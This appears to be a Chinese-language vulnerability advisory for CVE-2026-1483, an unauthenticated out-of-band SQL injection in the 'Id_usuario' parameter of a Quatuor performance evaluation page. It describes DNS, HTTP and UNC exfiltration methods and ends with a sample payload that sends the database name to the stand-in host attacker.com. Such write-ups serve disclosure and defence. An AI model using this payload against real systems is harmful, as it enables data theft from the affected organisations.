CVE-2026-1483CVE-2026-1483是Gabinete Técnico de Programación开发的Quatuor绩效评估(Performance Evaluation, EDD)应用中的一个高危带外SQL注入漏洞。该漏洞存在于'/evaluacion_objetivos_ver_auto.aspx'页面的'Id_usuario'参数中,CVSS评分达到7.5分,属于高危级别。攻击者无需任何认证凭证即可利用此漏洞,通过构造恶意SQL查询语句,利用DNS外带或HTTP外带等技术手段,将数据库中的敏感信息提取出来。由于是带外注入,攻击过程中受影响的应用程序本身不会直接返回查询结果,攻击者需要通过外部通道(如DNS解析请求、HTTP回调等)来接收泄露的数据。此漏洞主要威胁数据的机密性,攻击成功后可能泄露用户账户信息、业务数据、数据库结构等敏感信息,对组织的信息安全造成严重风险。
该漏洞为带外SQL注入(OOB SQLi)类型,与传统的带内SQL注入不同,攻击者无法直接从应用程序响应中获取查询结果,而是需要通过外部通道间接提取数据。漏洞点位于'/evaluacion_objetivos_ver_auto.aspx'页面的'Id_usuario'参数,攻击者可在该参数中注入恶意SQL语句。典型的OOB SQL注入利用方式包括:1)利用DNS解析外带数据,如通过LOAD_FILE函数读取文件并通过\'\\'.attacker.com路径触发DNS查询;2)利用HTTP请求外带数据,将查询结果作为URL参数发送到攻击者控制的服务器;3)利用数据库的SMB/UNC路径特性触发网络请求。攻击者通常先通过ORDER BY或布尔盲注技术确认漏洞存在,然后利用UNION SELECT或直接注入语句配合外带技术提取数据。常见payload如:Id_usuario=1' AND (SELECT LOAD_FILE(CONCAT('\\\\',(SELECT DATABASE()),'.attacker.com\\\\test')))--,该语句会让数据库尝试访问攻击者域名的UNC路径,从而在DNS日志中暴露数据库名等信息。